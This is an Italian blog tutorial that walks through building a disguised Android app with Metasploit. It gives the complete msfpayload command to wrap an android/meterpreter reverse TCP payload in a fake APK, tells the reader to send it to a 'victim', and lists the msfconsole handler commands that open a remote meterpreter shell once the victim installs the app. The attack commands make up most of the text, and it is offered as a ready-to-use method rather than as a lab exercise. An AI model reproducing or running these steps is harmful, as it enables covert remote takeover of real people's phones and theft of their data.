Ciao a tutti cari amici di iProg, nel tutorial di oggi voglio mostrarvi come poter hackerare un dispositivo Android attraverso l’ausilio di metasploit. Per chi non lo sapesse metasploit è un framework che consente ai penterster di velocizzare il processo di creazione di un exploit, ovviamente questo è una descrizione abbastanza generale delle potenzialità del tool stesso in quanto esso è molto di più. Maggiori informazioni sono reperibili sul sito ufficiale di metasploit. Quello che andremo a fare in questo tutorial è creare una “finta app” android che ci consentirà di prendere il controllo del dispositivo da remoto.Da kali lanciamo in esecuzione il programma terminale e scriviamo il seguente comando:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=443 R > /root/Desktop/angryPippo.apk
Una volta creata “l’app” la troveremo sul desktop quindi non ci resta che inviarla alla nostra vittima.
A questo punto lanciamo metasploit e scriviamo i seguenti comandi
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 443
exploit
Una volta che la nostra vittima installerà la nostra app sul dispositivo si aprirà una sessione di meterpreter
Per qualsiasi domanda o richiesta lasciate un commento qui oppure sulla pagina ufficiale di FB